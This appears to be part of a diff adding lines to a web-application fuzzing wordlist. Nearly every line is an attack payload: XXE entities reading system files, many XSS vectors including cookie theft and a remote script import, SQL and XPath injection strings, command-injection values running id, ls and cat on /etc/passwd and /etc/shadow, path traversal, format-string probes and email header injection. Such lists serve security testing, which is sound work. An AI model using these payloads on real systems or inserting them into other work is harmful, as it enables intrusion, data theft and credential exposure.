<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
354
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
355
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
356
|
+
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
357
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
358
|
+
<IMG DYNSRC="javascript:alert('XSS')">
|
359
|
+
<IMG LOWSRC="javascript:alert('XSS')">
|
360
|
+
<IMG SRC="  javascript:alert('XSS');">
|
361
|
+
<IMG SRC="jav ascript:alert('XSS');">
|
362
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
363
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
364
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
365
|
+
<IMG SRC="javascript:alert('XSS')"
|
366
|
+
<IMG SRC="javascript:alert('XSS');">
|
367
|
+
<IMG SRC=javascript:alert('XSS')>
|
368
|
+
<IMG SRC=javascript:alert('XSS')>
|
369
|
+
<IMG SRC=javascript:alert('XSS')>
|
370
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
371
|
+
<IMG SRC=`javascript:alert("'XSS'")`>
|
372
|
+
<IMG SRC=javascript:alert("XSS")>
|
373
|
+
<IMG SRC=javascript:alert('XSS')>
|
374
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
375
|
+
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
376
|
+
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
377
|
+
<IMG%20SRC='javascript:alert(document.cookie)'>
|
378
|
+
<foo></foo>
|
379
|
+
<name>','')); phpinfo(); exit;/*</name>
|
380
|
+
<script>alert("XSS")</script>
|
381
|
+
<script>alert(document.cookie)</script>
|
382
|
+
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
383
|
+
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
384
|
+
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
385
|
+
<xss><script>alert('XSS')</script></vulnerable>
|
386
|
+
<youremail>%0aBcc:<youremail>
|
387
|
+
<youremail>%0aCc:<youremail>
|
388
|
+
<youremail>%0d%0aBcc:<youremail>
|
389
|
+
<youremail>%0d%0aCc:<youremail>
|
390
|
+
=
|
391
|
+
='
|
392
|
+
=--
|
393
|
+
=;
|
394
|
+
>
|
395
|
+
?x=
|
396
|
+
?x="
|
397
|
+
?x=>
|
398
|
+
?x=|
|
399
|
+
@'
|
400
|
+
@'
|
401
|
+
@*
|
402
|
+
@variable
|
403
|
+
A
|
404
|
+
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
405
|
+
FALSE
|
406
|
+
NULL
|
407
|
+
PRINT
|
408
|
+
PRINT @@variable
|
409
|
+
TRUE
|
410
|
+
XXXXX.%p
|
411
|
+
XXXXX`perl -e 'print ".%p" x 80'`
|
412
|
+
[']
|
413
|
+
[']
|
414
|
+
\
|
415
|
+
\";alert('XSS');//
|
416
|
+
\"blah
|
417
|
+
\'
|
418
|
+
\'
|
419
|
+
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
420
|
+
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
421
|
+
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
422
|
+
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
423
|
+
\0
|
424
|
+
\00
|
425
|
+
\00\00
|
426
|
+
\00\00\00
|
427
|
+
\0\0
|
428
|
+
\0\0\0
|
429
|
+
\\
|
430
|
+
\\'/bin/cat%20/etc/passwd\\'
|
431
|
+
\\'/bin/cat%20/etc/shadow\\'
|
432
|
+
\\/
|
433
|
+
\\\\*
|
434
|
+
\\\\?\\
|
435
|
+
\n/bin/ls -al\n
|
436
|
+
\n/usr/bin/id;
|
437
|
+
\n/usr/bin/id\n
|
438
|
+
\n/usr/bin/id|
|
439
|
+
\nid;
|
440
|
+
\nid\n
|
441
|
+
\nid|
|
442
|
+
\nnetstat -a%\n
|
443
|
+
\t
|
444
|
+
\u003C
|
445
|
+
\u003c
|
446
|
+
\x23
|
447
|
+
\x27
|
448
|
+
\x27UNION SELECT
|
449
|
+
\x27\x4F\x52 SELECT *
|
450
|
+
\x27\x6F\x72 SELECT *
|
451
|
+
\x3C
|
452
|
+
\x3D \x27
|
453
|
+
\x3D \x3B'
|
454
|
+
\x3c
|
455
|
+
^'
|
456
|
+
^'
|
457
|
+
`
|
458
|
+
`/usr/bin/id`
|
459
|
+
`dir`
|
460
|
+
`id`
|
461
|
+
`perl -e 'print ".%p" x 80'`%n
|
462
|
+
`ping 127.0.0.1`
|
463
|
+
a);/usr/bin/id
|
464
|
+
a);/usr/bin/id;
|
465
|
+
a);/usr/bin/id|
|
466
|
+
a);id
|
467
|
+
a);id;
|
468
|
+
a);id|
|
469
|
+
a)|/usr/bin/id
|
470
|
+
a)|/usr/bin/id;
|
471
|
+
a)|id
|
472
|
+
a)|id;
|
473
|
+
a;/usr/bin/id
|
474
|
+
a;/usr/bin/id;
|
475
|
+
a;/usr/bin/id|
|
476
|
+
a;id
|
477
|
+
a;id;
|
478
|
+
a;id|
|
479
|
+
http://<yourservername>/
|
480
|
+
id%00
|
481
|
+
id%00|
|
482
|
+
insert
|
483
|
+
like
|
484
|
+
limit
|
485
|
+
null
|
486
|
+
or
|
487
|
+
or 0=0 #
|
488
|
+
or 0=0 --
|
489
|
+
or 1=1--
|
490
|
+
or%201=1
|
491
|
+
or%201=1 --
|
492
|
+
response.write 111111
|
493
|
+
something%00html
|
494
|
+
update
|
495
|
+
x' or 1=1 or 'x'='y
|
496
|
+
x' or name()='username' or 'x'='y
|
497
|
+
xsstest
|
498
|
+
xsstest%00"<>'
|
499
|
+
{'}
|
500
|
+
|/usr/bin/id
|
501
|
+
|/usr/bin/id|
|
502
|
+
|id
|
503
|
+
|id;
|
504
|
+
|id|
|
505
|
+
|ls
|
506
|
+
|ls -la
|
507
|
+
|nid\n
|
508
|
+
|usr/bin/id\n
|
509
|
+
||
|
510
|
+
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
511
|
+
||/usr/bin/id;
|
512
|
+
||/usr/bin/id|
|
513
|
+
}
|
514
|
+
|